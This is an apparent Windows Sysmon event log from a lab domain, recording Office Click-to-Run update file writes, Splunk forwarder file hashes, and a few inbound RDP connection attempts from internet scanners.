Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vcruntime140.dll2021-04-20 14:54:13.737 11241100x800000000000000064403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OMICAUTINTL.DLL2021-04-20 14:54:13.737 11241100x800000000000000064402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\mfc140u.dll2021-04-20 14:54:13.706 11241100x800000000000000064401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.706{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OcPubRes.dll2021-04-20 14:54:13.706 11241100x800000000000000064400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.706{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcp140.dll2021-04-20 14:54:13.706 11241100x800000000000000064399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vccorlib140.dll2021-04-20 14:54:13.690 11241100x800000000000000064398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\OCLTINT.DLL2021-04-20 14:54:13.659 11241100x800000000000000064397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VVIEWRES.DLL2021-04-20 14:54:13.643 11241100x800000000000000064396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VBAOWS10.CHM2021-04-20 14:54:13.643 11241100x800000000000000064395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\1033\NATIVESHIM.RESOURCES.DLL2021-04-20 14:54:13.643 11241100x800000000000000064394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\OcHelperResource.dll2021-04-20 14:54:13.643 11241100x800000000000000064393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\MAPISHELLR.DLL2021-04-20 14:54:13.643 11241100x800000000000000064392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\BHOINTL.DLL2021-04-20 14:54:13.643 11241100x800000000000000064391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msoshext.dll2021-04-20 14:54:13.643 11241100x800000000000000064390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\concrt140.dll2021-04-20 14:54:13.643 11241100x800000000000000064389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.643{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBUI6.CHM2021-04-20 14:54:13.503 11241100x800000000000000064388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso30win32client.dll2021-04-20 14:54:13.487 11241100x800000000000000064387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBOB6.CHM2021-04-20 14:54:13.487 11241100x800000000000000064386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBLR6.CHM2021-04-20 14:54:13.487 11241100x800000000000000064385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso40UIwin32client.dll2021-04-20 14:54:13.487 11241100x800000000000000064384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\FM20ENU.DLL2021-04-20 14:54:13.487 11241100x800000000000000064383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.393{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\EEINTL.DLL2021-04-20 14:54:13.393 11241100x800000000000000064382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL2021-04-20 14:54:13.378 11241100x800000000000000064381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\OSFINTL.DLL2021-04-20 14:54:13.378 11241100x800000000000000064380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBEUIINTL.DLL2021-04-20 14:54:13.378 11241100x800000000000000064379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ADO210.CHM2021-04-20 14:54:13.378 11241100x800000000000000064378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\STINTL.DLL2021-04-20 14:54:13.378 11241100x800000000000000064377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\FM20.CHM2021-04-20 14:54:13.362 11241100x800000000000000064376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM2021-04-20 14:54:13.346 11241100x800000000000000064375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM2021-04-20 14:54:13.346 11241100x800000000000000064374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBHW6.CHM2021-04-20 14:54:13.346 11241100x800000000000000064373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\GettingStarted16\SLINTL.DLL2021-04-20 14:54:13.346 23542300x800000000000000064372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.221{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C3E59B4DFB598D9CA5B046AC42623D,SHA256=74864CE0AE65056587ACB8B0CF54732883ACF6C2534C6D9EB8D0F96711DA4641,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ORGCINTL.DLL2021-04-20 14:54:13.206 11241100x800000000000000064370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OMSINTL.DLL2021-04-20 14:54:13.206 23542300x800000000000000064369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.206{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9943A560BB0DD853C38DA29C3C7BA51A,SHA256=A87CA634285969F4AD5097BC3EEED13096F6EE420C943C9991E636C76BCAF91B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SAMPLES\SOLVSAMP.XLS2021-04-20 14:54:13.190 354300x800000000000000064367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:11.900{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53139-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000064366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.143{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8ES.DLL2021-04-20 14:54:13.143 11241100x800000000000000064365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8EN.DLL2021-04-20 14:54:13.112 11241100x800000000000000064364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QRYINT32.DLL2021-04-20 14:54:13.081 11241100x800000000000000064363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SkypeForBusinessVDI2019_eula.txt2021-04-20 14:54:13.050 11241100x800000000000000064362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\STSLISTI.DLL2021-04-20 14:54:13.050 11241100x800000000000000064361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\STSLIST.CHM2021-04-20 14:54:13.050 11241100x800000000000000064360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\VVIEWRES.DLL2021-04-20 14:54:13.050 11241100x800000000000000064359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WacLangPackEula.txt2021-04-20 14:54:13.018 11241100x800000000000000064358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\TRANSMRR.DLL2021-04-20 14:54:13.003 11241100x800000000000000064357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLMACRO.CHM2021-04-20 14:54:13.003 23542300x800000000000000049477Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:13.588{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8EA094625F175E0E97401C64405A253,SHA256=401A9ECB40966EABF7E0A8D387D2B05BFA9929E6581BD8883B6422D548D1AE9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049476Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:13.510{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9455F5EDAE9813CA720409A8C7FB1FD5,SHA256=3358F87056259B0210260B9CEC10C17C76B5A79478CC77B503AE05C755949445,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049475Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:10.871{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57594-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\concrt140.dll2021-04-20 14:54:14.909 11241100x800000000000000064488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt2021-04-20 14:54:14.534 11241100x800000000000000064487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLV.PPT2021-04-20 14:54:14.534 11241100x800000000000000064486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dll2021-04-20 14:54:14.534 11241100x800000000000000064485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft SQL Server\130\Shared\msasxpress.dll2021-04-20 14:54:14.534 11241100x800000000000000064484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vccorlib140.dll2021-04-20 14:54:14.534 11241100x800000000000000064483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLV.XLS2021-04-20 14:54:14.534 11241100x800000000000000064482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLN.XLS2021-04-20 14:54:14.534 11241100x800000000000000064481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTTPLN.PPT2021-04-20 14:54:14.534 11241100x800000000000000064480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PROTOCOLHANDLERINTL.DLL2021-04-20 14:54:14.534 11241100x800000000000000064479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft 